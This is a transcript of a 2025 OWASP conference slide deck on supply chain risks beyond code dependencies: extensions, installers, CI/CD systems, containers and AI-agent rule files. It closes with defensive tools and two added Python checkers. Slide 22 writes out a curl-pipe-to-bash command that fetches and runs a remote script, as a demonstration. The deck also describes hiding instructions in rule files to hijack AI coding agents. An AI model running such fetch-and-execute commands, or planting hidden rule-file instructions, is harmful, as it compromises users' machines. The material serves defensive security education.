You secured your code dependencies, is that enough?

A presentation at OWASP London in June 2025 in London, UK, by Anant Shrivastava

Slide 1

You secured your code dependencies, is that enough?

Anant Shrivastava

Slide 2

Anant Shrivastava

● Chief researcher @ Cyfinoid Research (Research Powered Trainings)
● 17+ yrs of corporate exposure
● Speaker / Trainer: BH/DC, c0c0n, nullcon, RootConf, RuxCon
● Project Lead:
  ○ Code Vigilant (Code Review Project)
  ○ Hacking Archives of India
  ○ TamerPlatform (Android Security)

(@anantshri on social platforms) https://anantshri.info

Slide 3

Question: Have you heard about

• SOFTWARE SUPPLY CHAIN SECURITY
• SBOM (SOFTWARE BILL OF MATERIAL)
• SOURCE COMPOSITION ANALYSIS TOOLS

Slide 4

Why?

Incidents
• SolarWinds
• Codecov
• Colonial Pipeline

Result
• EO by US President

Slide 5

Supply Chain issues are age old trust issues

Ken Thompson talked about supply chain security and inherent trust in 1983. During the lecture, Ken outlines a three-step process for altering a C compiler binary to implant a backdoor when compiling the “login” program, all without leaving any evidence in the source code. He got the idea from an older US military document published in 1974 titled “MULTICS SECURITY EVALUATION”.

Ref

● https://users.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf
● https://research.swtch.com/nih
● https://seclab.cs.ucdavis.edu/projects/history/papers/karg74.pdf

Slide 6

…and it’s not going anywhere anytime soon…

In a report, the European Union Agency for Cybersecurity (ENISA) names Supply Chain Compromise of Software Dependencies as one of the threats expected to be at its peak.

Ref: https://www.enisa.europa.eu/publications/enisa-foresight-cybersecurity-threats-for-2030

Slide 7

Effect across the globe in Govt

Japan, US, EU, India, UK

https://ec.europa.eu/commission/presscorner/detail/en/ip_22_5374
https://www.japantimes.co.jp/news/2022/05/11/business/japan-passes-economic-security-bill-protect-sensitive-technology/
https://www.federalregister.gov/d/2021-10460/p-54
https://www.cert-in.org.in/PDF/SBOM_Guidelines.pdf

Slide 8

Why now?

• Software build automation == quicker release cycle
• Automated release cycle == less wait for features
• Faster feature release == less inclination to upgrade dependencies
• Too much focus on OSS Codebase without helping the maintainers
• Impossible segregation of features and bug fixes
• Automated notification of vulnerability (hedonic hamster wheel)

Slide 9

Work done by Dependabot in last ~5 months

Start of Feb 2025 End of June 2025

2451693 issues closed 120751 new issues created

Slide 10

What is Software Bill of Material

• Itemized list of all the ingredients in the software
• Ingredients ~ third-party components
• SBoMs mostly cover one level of depth only, with other levels plugged into each other.

https://www.ntia.gov/report/2021/minimum-elements-software-bill-materials-sbom

Slide 11

SCA: Source Composition Analysis Tools

• Generate or Consume SBoM
• Identify
  ○ Outdated Software
  ○ Insecure Software
  ○ EOL Product
• And more

Slide 12

Question: Raise your hands if

• You have SCA tooling in your organization?
• You follow vulnerability management practices for source code components?

Slide 13

Let the fun begin

Slide 14

Software Supply Chains beyond Code chain

• We have focused too much on the software code itself
• As consumers, we are dealing with too many chains we are not aware of
• As a company, there are dependency chains far beyond code dependencies

Slide 15

What other chains?

Any software or application which allows a 3rd party to add or modify functionality

• Pluggable modules / plugins
• Extensions
• Theming customizations

Slide 16

A set of chains that existed 5 months back

A developer uses a Chrome extension to manipulate AI prompts, which are then fed into Visual Studio Code through a set of AI-driven code completion extensions. The resulting code is committed to GitHub, where a set of GitHub Actions automatically run analysis and tests. The code is then containerized into a Docker image, deployed on Kubernetes, running inside an EC2 instance, built from a specific AMI.

Slide 17

A Chain that exists now (besides previous)

A developer uses an autonomous AI agent to write code by providing it a one-line prompt and full access to the command line. The resulting code is committed to GitHub, where a set of GitHub Actions automatically run analysis and tests. The code is then containerized into a Docker image, deployed on Kubernetes, running inside an EC2 instance, built from a specific AMI.

Slide 18

Simplified Supply Chain view

Slide 19

Why do they matter

• PRODUCTION IS HARDENED, DEV NOT SO MUCH
• EASIER TO COMPROMISE LESS GUARDED PATHS
• SMALLER ORGS EASIER TO INFILTRATE / OCCUPY / ACQUIRE

Slide 20

Developer Machine: Why lucrative

• Lots of credentials and access
• Developers require a bit of lax security to get the job done
• Exceptions in network policy rules
• Mostly will have admin access
• Multiple powerful apps (IDE, debugger, etc.)

Slide 21

Show me data, don’t just imagine

Slide 22

Case studies: WYS Is not WYG

Content delivered differently to curl and browser

Don’t curl | sh

https://jordaneldredge.com/blog/one-way-curl-pipe-sh-install-scripts-can-be-dangerous/

Don’t pipe to shell

https://www.seancassidy.me/dont-pipe-to-your-shell.html

curl https://anantshri.info/fun/legitimate.sh | bash

Slide 23

Chrome Browser

• By Google (claimed as fastest)
• Installer runs without admin privilege (you can cancel admin prompts)
• https://arstechnica.com/security/2025/01/dozens-of-backdoored-chrome-extensions-discovered-on-2-6-million-devices/

Slide 24

What can a browser extension do

Slide 25

Cookie Monster

• https://gbhackers.com/malicious-editthiscookie-extension/

Slide 26

Visual Studio Code

• Too many examples to count
• https://www.bleepingcomputer.com/news/security/malicious-vscode-extensions-with-millions-of-installs-discovered/

Slide 27

Visual Studio Marketplaces

• VS Code extensions marketplace is only usable by MS products
• https://open-vsx.org “Extensions for VS Code Compatible Editors”
• Just over 8 million developers depend on Open VSX across dozens of VS Code based editors, including Cursor, Windsurf, Google Cloud Shell Editor, and GitLab Web IDE
• By exploiting a CI issue, a malicious actor could publish malicious updates to every extension on Open VSX
• Ref: https://blog.koi.security/marketplace-takeover-how-we-couldve-taken-over-every-developer-using-a-vscode-fork-f0f8cf104d44

Slide 28

Homebrew

• Google ads to bring traffic
• Near replica of website
• Serving install.sh with fake admin password prompt

https://x.com/ryanchenkie/status/1880730173634699393

Slide 29

Unexpected places for code execution

https://manpages.debian.org/bookworm/apt/sources.list.5.en.html
https://www.golinuxhub.com/2018/05/how-to-execute-script-at-pre-post-preun-postun-spec-file-rpm/

Slide 30

Unexpected places for code execution

Git exploit when running git clone --recurse-submodules

Slide 31

Notepad++

https://cybersecuritynews.com/hackers-hijacked-notepad-plugin/

Slide 32

Notepad++ Impersonation

• https://notepad-plus-plus.org/news/help-to-take-down-parasite-site/

Slide 33

Cursor oh Cursor

Slide 34

Rulefiles

• Remember those CTFs where the flag was hidden in whitespace
• Just that, but dangerous

https://www.pillar.security/blog/new-vulnerability-in-github-copilot-and-cursor-how-hackers-can-weaponize-code-agents
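
A way to check a rules file for content a reviewer cannot see, as an added example that is not part of the original slides. The sample text, the trailing-whitespace threshold and the function names are assumptions made for illustration.

```python
import unicodedata

# Invisible code points that fall outside categories Cf/Zs/Zl/Zp (Hangul fillers).
EXTRA_INVISIBLE = {0x115F, 0x1160, 0x3164, 0xFFA0}
TRAILING_WS_LIMIT = 4  # assumed threshold for suspicious trailing space/tab runs


def is_hidden(ch):
    """True for characters that render as nothing or as blank space."""
    if ch in " \t\r\n":
        return False
    return (unicodedata.category(ch) in ("Cf", "Zs", "Zl", "Zp")
            or ord(ch) in EXTRA_INVISIBLE)


def scan_rules(text):
    """Return findings as (line_no, column, description) tuples."""
    findings = []
    # split("\n") keeps U+2028/U+2029 inside the line so they are reported.
    for line_no, line in enumerate(text.split("\n"), start=1):
        for col, ch in enumerate(line, start=1):
            if is_hidden(ch):
                name = unicodedata.name(ch, "UNNAMED")
                findings.append((line_no, col, f"U+{ord(ch):04X} {name}"))
        stripped = line.rstrip(" \t")
        trailing = len(line) - len(stripped)
        if trailing >= TRAILING_WS_LIMIT:
            findings.append((line_no, len(stripped) + 1,
                             f"{trailing} trailing space/tab characters"))
    return findings


# Constructed sample rules file; escapes keep the hidden characters visible here.
SAMPLE = (
    "# Project coding rules\n"
    "Always use parameterised queries.\u200b\u200d\n"
    "Prefer the standard library. \t \t \t\n"
    "Keep functions \u202eshort\u202c and documented.\n"
)

if __name__ == "__main__":
    for line_no, col, what in scan_rules(SAMPLE):
        print(f"line {line_no}, col {col}: {what}")
```

Run as a pre-commit or CI check over rule and prompt files so that any finding blocks the merge until a human has looked at the raw bytes.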

Slide 35

C.I. / C.D. Systems

• Not just automation
• Watch over the entire build or deployment practices
• Essential Watchers in the current landscape

Slide 36

DEFENDING CI CD

https://media.defense.gov/2023/Jun/28/2003249466/-1/-1/0/CSI_DEFENDING_CI_CD_ENVIRONMENTS.PDF

Slide 37

TeamCity exploitation

https://www.darkreading.com/vulnerabilities-threats/global-teamcity-exploitation-opens-door-to-solarwinds-style-nightmare

Slide 38

Container Images

• Don’t install software
• Download containers
• Docker (ish) options needed

https://www.infosecurity-magazine.com/news/malicious-containers-found-docker/
https://blog.aquasec.com/supply-chain-threats-using-container-images

Slide 39

Dependency Caching Servers

https://socket.dev/blog/malicious-package-exploits-go-module-proxy-caching-for-persistence

Slide 40

Bait and Switch

Package created with a good intent but later abused

WordPress free plugin purchased and backdoored
• https://www.bleepingcomputer.com/news/security/backdoor-found-in-wordpress-plugin-with-more-than-300-000-installations/

Slide 41

Rogue Maintainers

  • peacenotwar module sabotages npm developers in the node-ipc package to protest the invasion of Ukraine. Overwrites all files with ❤ if origin is Russia or Belarus.
  • Malware Civil War - 25 malicious packages in npm, with some posing as “colors.js,” and even an instance of malware authors targeting each other through a package called “lemaaa” designed to manipulate Discord accounts.
  • Open source developer corrupts widely-used libraries, affecting tons of projects - For packages colors.js and faker.js, the maintainer pushed a corrupt update that triggers an infinite loop of weird characters.

Slide 42

So, what's the plan?

• A - Awareness: Identify and move unknown risks into known risks.
• T - Trust But Verify: Every dependency, tool, and service should be validated.
• O - Ongoing Monitoring: Continuous security checks to detect changes & anomalies.
• M - Measure & Map: Build capabilities to answer real questions (e.g., how many machines have Chrome installed? How many plugins exist in GitHub workflows?).
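
One way to answer the "how many plugins exist in GitHub workflows?" question from the Measure & Map step, as an added example that is not part of the original slides. It counts every `uses:` reference and lists those not pinned to a full commit SHA; the workflow contents, the `example-org` actions and the 40-character SHA are constructed for illustration.

```python
import re
from collections import Counter

# Matches step-level and job-level `uses:` keys; commented-out lines do not match.
USES_RE = re.compile(r"^\s*(?:-\s*)?uses:\s*['\"]?([^'\"\s#]+)", re.MULTILINE)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def classify(ref):
    """Classify one `uses:` value by how it is pinned."""
    if ref.startswith("./"):
        return "local"
    if ref.startswith("docker://"):
        return "docker"
    _, _, version = ref.partition("@")
    if FULL_SHA_RE.match(version):
        return "pinned-sha"
    return "mutable-ref" if version else "unpinned"


def inventory(workflows):
    """Map {path: yaml_text} to (Counter per action, list of refs to review)."""
    counts, review = Counter(), []
    for path, text in sorted(workflows.items()):
        for ref in USES_RE.findall(text):
            kind = classify(ref)
            if kind == "local":  # code from the same repository
                continue
            counts[ref.partition("@")[0]] += 1
            if kind != "pinned-sha":  # tags and branches can be moved later
                review.append((path, ref, kind))
    return counts, review


# Constructed sample; in practice read every file under .github/workflows/.
SAMPLE_WORKFLOWS = {
    ".github/workflows/ci.yml": (
        "jobs:\n  test:\n    steps:\n"
        "      - uses: actions/checkout@v4\n"
        "      - uses: example-org/lint-action@0123456789abcdef0123456789abcdef01234567\n"
        "      - uses: ./.github/actions/local-build\n"),
    ".github/workflows/release.yml": (
        "jobs:\n  ship:\n    steps:\n"
        "      - uses: actions/checkout@v4\n"
        "      - uses: example-org/deploy-action@main\n"),
}

if __name__ == "__main__":
    counts, review = inventory(SAMPLE_WORKFLOWS)
    print(f"{len(counts)} distinct actions, {sum(counts.values())} references")
    for path, ref, kind in review:
        print(f"review: {path}: {ref} ({kind})")
```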

Slide 43

Next Steps

No matter how hard I try I will not be able to cover the full breadth

Slide 44

Chrome Extension Auditing

https://www.extensionauditor.com/

Slide 45

End Point Visibility

https://www.osquery.io/

Ref: https://medium.com/quiq-blog/detecting-high-risk-chrome-extensions-with-osquery-bca1a8856448

Slide 46

GitHub and GitHub Actions

Basic Common Sense
● Signed Commit
● Protected Branches
● Force reviews for pull request approval
● Force signed commits

Slide 47

GitHub and GitHub Actions

Tooling
● https://github.com/Legit-Labs/legitify
● https://best.openssf.org/SCM-BestPractices/
● Implement allstar to enforce secure baselines in the organization.
● https://docs.zizmor.sh

Slide 48

Consumer : Vetting Process needed (Vet)

https://docs.safedep.io/

Slide 49

Consumer : Vetting Process Needed (Overlay)

Overlay is a browser extension that helps developers evaluate open source packages before picking them. It gathers data from various sources, such as Snyk Advisor, Debricked, Socket.dev, and Deps.dev, and displays them on the package pages of popular registries like npm, PyPI, and Go.

Install - https://github.com/osscar/overlay#installation

Ref - https://checkmarx.com/blog/software-supply-chain-security-leaders-collaborate-and-build-browser-extension-to-help-developers-choose-open-source/

Slide 50

Cloud Auditing

• ScoutSuite: https://github.com/nccgroup/ScoutSuite
• Prowler: https://github.com/prowler-cloud/prowler
• Kube-hunter: https://github.com/aquasecurity/kube-hunter
• Kube-bench: https://github.com/aquasecurity/kube-bench
• KubiScan: https://github.com/cyberark/KubiScan
• Kubeaudit: https://github.com/Shopify/kubeaudit
• Trivy: https://github.com/aquasecurity/trivy
• Cosign: Provenance: https://github.com/sigstore/cosign

Slide 51

Broad Visualization of Software Supply Chain

https://github.com/SecureStackCo/visualizing-software-supply-chain?tab=readme-ov-file

Slide 52

Supply-chain Levels for Software Artifacts

https://slsa.dev/

Slide 53

OWASP SCVS ~ SSDF

• https://scvs.owasp.org/
• https://csrc.nist.gov/Projects/ssdf

Slide 54

Open Software Supply Chain Attack Reference

https://pbom.dev/

Slide 55

Can of worms that I have not touched

SaaS

IoT

Slide 56

Thanks for listening & open to Questions?

@anantshri

anant @ cyfinoid.com